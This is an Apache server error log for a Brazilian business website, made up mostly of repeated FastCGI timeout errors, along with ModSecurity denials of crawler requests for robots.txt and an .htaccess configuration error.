[Mon Mar 16 00:36:03.130074 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54556] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:36:25.137884 2026] [proxy_fcgi:error] [pid 10709:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54712] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:36:46.033881 2026] [proxy_fcgi:error] [pid 32654:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54830] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:37:10.133907 2026] [proxy_fcgi:error] [pid 10831:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55032] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:37:19.155093 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.244.31:60096] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd677ABkC4fWIHEf8G44QAAAEw"]
[Mon Mar 16 00:37:31.124776 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55162] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:37:52.149898 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55312] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:37:53.299780 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.228.16:36614] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd7EbABkC4fWIHEf8G49gAAAEs"]
[Mon Mar 16 00:38:13.134107 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55438] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:38:34.129786 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55624] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:38:56.135224 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55786] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:39:21.033880 2026] [proxy_fcgi:error] [pid 10772:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56000] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:39:42.121730 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56110] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:40:03.127520 2026] [proxy_fcgi:error] [pid 10772:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56224] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:40:25.125818 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56374] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:40:47.123894 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56514] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:41:12.082046 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56608] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:41:33.069916 2026] [proxy_fcgi:error] [pid 10772:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56802] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:41:54.136637 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56942] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:42:15.095110 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57086] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:42:37.133960 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57258] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:42:40.147351 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.244.31:51486] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd8MJqj1wV0Si-Okee0qQAAAAM"]
[Mon Mar 16 00:42:58.129824 2026] [proxy_fcgi:error] [pid 10831:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57388] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:43:13.357197 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.228.16:45854] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd8UQlT9VtDQc7bgUxlzgAAAQY"]
[Mon Mar 16 00:43:19.212721 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57496] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:43:40.066956 2026] [proxy_fcgi:error] [pid 10709:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57666] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:44:01.072032 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57802] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:44:22.069962 2026] [proxy_fcgi:error] [pid 10709:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57960] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:44:44.108044 2026] [proxy_fcgi:error] [pid 10772:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58092] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:45:05.102171 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58192] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:45:26.081166 2026] [proxy_fcgi:error] [pid 10772:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58346] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:45:49.129892 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58494] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:46:10.126184 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58664] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:46:31.133780 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58794] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:46:52.059690 2026] [proxy_fcgi:error] [pid 10709:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58922] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:47:14.418970 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59022] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:47:36.069901 2026] [proxy_fcgi:error] [pid 10709:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59220] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:47:48.797321 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.244.31:41258] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd9ZI6lpbStxTqkSks6JgAAAlA"]
[Mon Mar 16 00:47:57.125818 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59362] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:48:18.129839 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59540] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:48:39.149788 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59666] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:49:00.037861 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59832] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:49:21.129828 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60002] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:49:42.142310 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60104] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:50:03.125825 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60198] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:50:24.134593 2026] [proxy_fcgi:error] [pid 32654:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60278] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:50:46.133283 2026] [proxy_fcgi:error] [pid 10831:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60416] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:51:08.125783 2026] [proxy_fcgi:error] [pid 10772:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60598] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:51:29.130566 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60686] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:51:50.133776 2026] [proxy_fcgi:error] [pid 10772:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60854] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:52:12.025817 2026] [proxy_fcgi:error] [pid 10709:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60976] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:52:33.061836 2026] [proxy_fcgi:error] [pid 10651:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:32920] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:52:54.125825 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33092] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:53:16.054289 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33220] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:53:37.137811 2026] [proxy_fcgi:error] [pid 10651:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33348] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:53:58.066614 2026] [proxy_fcgi:error] [pid 10651:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33486] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:54:19.121817 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33672] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:54:40.053820 2026] [proxy_fcgi:error] [pid 10831:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33768] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:55:01.118303 2026] [proxy_fcgi:error] [pid 10651:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33932] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:55:22.129855 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34032] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:55:43.120850 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34172] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:56:04.103733 2026] [proxy_fcgi:error] [pid 10709:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34282] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:56:26.134332 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34396] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:56:47.113877 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34516] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:57:08.077785 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34626] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:57:30.059429 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34730] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:57:51.135445 2026] [proxy_fcgi:error] [pid 10709:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34882] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:58:12.120722 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35012] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:58:21.879565 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.244.31:57938] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd_3Zqj1wV0Si-Okee1DwAAABg"]
[Mon Mar 16 00:58:33.068559 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35138] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:58:42.271074 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.228.16:60250] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abd_8v9ocpUE4ed4uDy-hwAAAgk"]
[Mon Mar 16 00:58:54.121798 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35296] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:59:15.121831 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35390] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:59:36.133848 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35480] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 00:59:57.089853 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35634] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:00:18.061989 2026] [proxy_fcgi:error] [pid 10772:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35764] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:00:39.125806 2026] [proxy_fcgi:error] [pid 10709:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35856] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:01:00.125803 2026] [proxy_fcgi:error] [pid 10651:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35984] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:01:21.058344 2026] [proxy_fcgi:error] [pid 10651:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36072] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:01:43.034174 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36164] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:02:04.073106 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36260] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:02:25.121766 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36426] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:02:47.045830 2026] [proxy_fcgi:error] [pid 10651:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36574] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:03:09.046019 2026] [proxy_fcgi:error] [pid 10651:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36696] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:03:30.033957 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36826] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:03:39.853213 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.244.31:40258] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeBG_9ocpUE4ed4uDy-qAAAAgU"]
[Mon Mar 16 01:03:51.133824 2026] [proxy_fcgi:error] [pid 10772:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37010] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:04:04.104233 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.228.16:46350] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeBNBXjF1vJNtV6CWrH_QAAAco"]
[Mon Mar 16 01:04:12.136725 2026] [proxy_fcgi:error] [pid 10651:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37180] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:04:33.070261 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37266] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:04:54.129785 2026] [proxy_fcgi:error] [pid 10772:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37374] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:05:15.125885 2026] [proxy_fcgi:error] [pid 10709:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37470] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:05:36.129781 2026] [proxy_fcgi:error] [pid 10651:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37614] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:05:57.057995 2026] [proxy_fcgi:error] [pid 10651:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37742] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:06:19.152239 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37892] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:06:40.112050 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38008] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:07:02.133780 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38150] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:07:23.060051 2026] [proxy_fcgi:error] [pid 10651:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38294] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:07:44.129857 2026] [proxy_fcgi:error] [pid 10651:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38442] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:08:05.125839 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38618] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:08:26.129852 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38820] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:08:47.085974 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38942] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:08:47.628301 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.244.31:41044] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeCT5qj1wV0Si-Okee1iwAAAAk"]
[Mon Mar 16 01:09:06.918890 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.228.16:42448] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeCYo6lpbStxTqkSks69gAAAkU"]
[Mon Mar 16 01:09:09.129826 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39052] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:09:30.097832 2026] [proxy_fcgi:error] [pid 10651:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39180] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:09:51.045897 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39294] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:10:12.118311 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39486] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:10:33.126487 2026] [proxy_fcgi:error] [pid 32654:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39666] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:10:58.197956 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39834] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:11:16.562304 2026] [core:alert] [pid 10772:tid 140411708356352] [client 13.38.45.165:37226] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Mon Mar 16 01:11:19.422903 2026] [proxy_fcgi:error] [pid 10831:tid 140411725141760] [client 5.35.38.15:59784] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/
[Mon Mar 16 01:11:21.045859 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39952] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:11:43.062339 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40066] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:12:05.097925 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40340] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:12:26.121799 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40564] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:12:47.126476 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40656] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:13:08.045925 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40820] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:13:31.069884 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40926] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:13:52.101849 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41048] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:14:09.242891 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.244.31:56928] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeDkY6lpbStxTqkSks7GQAAAkU"]
[Mon Mar 16 01:14:13.057899 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41178] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:14:28.240149 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.228.16:59432] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeDpAlT9VtDQc7bgUxnhQAAAQY"]
[Mon Mar 16 01:14:35.057958 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41306] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:14:56.129714 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41500] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:15:18.125309 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41682] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:15:39.141783 2026] [proxy_fcgi:error] [pid 10651:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41784] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:16:00.140077 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41916] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:16:22.117724 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42138] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:16:44.129829 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42266] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:17:05.082247 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42424] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:17:28.083057 2026] [proxy_fcgi:error] [pid 10709:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42580] AH01075: Error dispatching request to : (polling)
